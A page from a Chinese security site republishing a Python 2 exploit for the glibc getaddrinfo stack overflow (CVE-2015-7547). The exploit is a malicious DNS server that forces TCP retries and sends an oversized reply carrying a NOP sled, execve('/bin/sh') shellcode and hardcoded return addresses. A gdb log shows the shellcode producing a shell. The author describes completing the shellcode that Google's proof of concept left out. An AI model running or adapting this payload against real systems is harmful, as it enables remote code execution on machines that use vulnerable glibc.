首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 glibc - getaddrinfo Stack Based Buffer Overflow 来源：SpeeDr00t@Blackfalcon 作者：SpeeDr00t 发布时间：2016-09-07   ''' add by SpeeDr00t@Blackfalcon (jang kyoung chip)   This is a published vulnerability by google in the past. Please refer to the link below.    Reference: - https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html - https://github.com/fjserna/CVE-2015-7547 - CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow   When Google announced about this code(vulnerability), it was missing information on shellcode. So, I tried to completed the shellcode. In the future, I hope to help your study.       (gdb) gdb -q client1 Undefined command: "gdb".  Try "help". (gdb) r Starting program: /home/haker/client1 Got object file from memory but can't read symbols: File truncated. [UDP] Total Data len recv 36 [UDP] Total Data len recv 36 udp send sendto 1 TCP Connected with 127.0.0.1:60259 [TCP] Total Data len recv 76 [TCP] Request1 len recv 36 data1 = �� foobargooglecom query = foobargooglecom $(� foobargooglecom [TCP] Request2 len recv 36 sendto 2 data1_reply data2_reply [UDP] Total Data len recv 36 [UDP] Total Data len recv 36 udp send sendto 1 TCP Connected with 127.0.0.1:60260 [TCP] Total Data len recv 76 [TCP] Request1 len recv 36 data1 = �� foobargooglecom query = foobargooglecom $�7 foobargooglecom [TCP] Request2 len recv 36 sendto 2 data1_reply data2_reply process 6415 is executing new program: /bin/dash $ id uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) $        '''   import socket import time import struct import threading   IP = '192.168.111.5' # Insert your ip for bind() here... ANSWERS1 = 184   terminate = False last_reply = None reply_now = threading.Event()     def dw(x):     return struct.pack('>H', x)   def dd(x):     return struct.pack('>I', x)   def dl(x):     return struct.pack('<Q', x)   def db(x):     return chr(x)   def udp_thread():     global terminate       # Handle UDP requests     sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)     sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)     sock_udp.bind((IP, 53))       reply_counter = 0     counter = -1       answers = []       while not terminate:         data, addr = sock_udp.recvfrom(1024)         print '[UDP] Total Data len recv ' + str(len(data))         id_udp = struct.unpack('>H', data[0:2])[0]         query_udp = data[12:]           # Send truncated flag... so it retries over TCP         data = dw(id_udp)                          # id         data += dw(0x8380)                     # flags with truncated set         data += dw(1)                        # questions         data += dw(0)                        # answers         data += dw(0)                        # authoritative         data += dw(0)                        # additional         data += query_udp                    # question         data += '\x00' * 2500                # Need a long DNS response to force malloc           answers.append((data, addr))           if len(answers) != 2:             continue           counter += 1           if counter % 4 == 2:             answers = answers[::-1]             print 'udp send '         time.sleep(0.01)         sock_udp.sendto(*answers.pop(0))           print 'sendto 1 '         reply_now.wait()         sock_udp.sendto(*answers.pop(0))         print 'sendto 2 '       sock_udp.close()     def tcp_thread():     global terminate     counter = -1       #Open TCP socket     sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)     sock_tcp.bind((IP, 53))     sock_tcp.listen(10)       print 'a'          while not terminate:         conn, addr = sock_tcp.accept()         counter += 1         print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])           # Read entire packet         data = conn.recv(1024)         print '[TCP] Total Data len recv ' + str(len(data))           reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])         print '[TCP] Request1 len recv ' + str(reqlen1)         data1 = data[2:2+reqlen1]           print 'data1 = ' +data1           id1 = struct.unpack('>H', data1[0:2])[0]         query1 = data[12:]           print 'query = ' + query1           # Do we have an extra request?         data2 = None         if len(data) > 2+reqlen1:             reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])             print '[TCP] Request2 len recv ' + str(reqlen2)             data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]             id2 = struct.unpack('>H', data2[0:2])[0]             query2 = data2[12:]           # Reply them on different packets     data = ''     data += dw(id1)                      # id     data += dw(0x8180)                   # flags     data += dw(1)                        # questions     data += dw(ANSWERS1)                 # answers     data += dw(0)                        # authoritative     data += dw(0)                        # additional     data += query1                       # question           for i in range(ANSWERS1):         answer = dw(0xc00c)  # name compressed         answer += dw(1)      # type A         answer += dw(1)      # class         answer += dd(13)     # ttl         answer += dw(4)      # data length         answer += 'D' * 4    # data           data += answer       data1_reply = dw(len(data)) + data       if data2:         data = ''         data += dw(id2)         data += 'A' * (6)         data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'         data += '\x90' * (44)         data += '\x90' * (1955)         data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'         data += '\x90' * (100)         data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'         data += 'F' * (8)         data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'         data += 'G' * (134)         data2_reply = dw(len(data)) + data     else:         data2_reply = None       reply_now.set()     time.sleep(0.01)     conn.sendall(data1_reply)     print 'data1_reply'     time.sleep(0.01)     if data2:         conn.sendall(data2_reply)         print 'data2_reply'       reply_now.clear()       sock_tcp.shutdown(socket.SHUT_RDWR)     sock_tcp.close()     if __name__ == "__main__":       t = threading.Thread(target=udp_thread)     t.daemon = True     t.start()     tcp_thread()     terminate = True   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MySQL 5.5.45 (64bit) - Local C ·WIN-911 7.17.00 - Multiple Vul ·Navicat Premium 11.2.11 (64bit ·Multiple Applications - Local ·TeamViewer 11.0.65452 (64 bit) ·Belkin F9K1122v1 1.00.30 - Buf ·SugarCRM 6.5.23 - REST PHP Obj ·FormatFactory 3.9.0 .task Stac ·Adobe ColdFusion < 11 Update 1 ·Easy File Sharing Web Server 7 ·Apache/mod_ssl OpenSSL < 0.9.6 ·FortiClient SSLVPN 5.4 - Crede   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved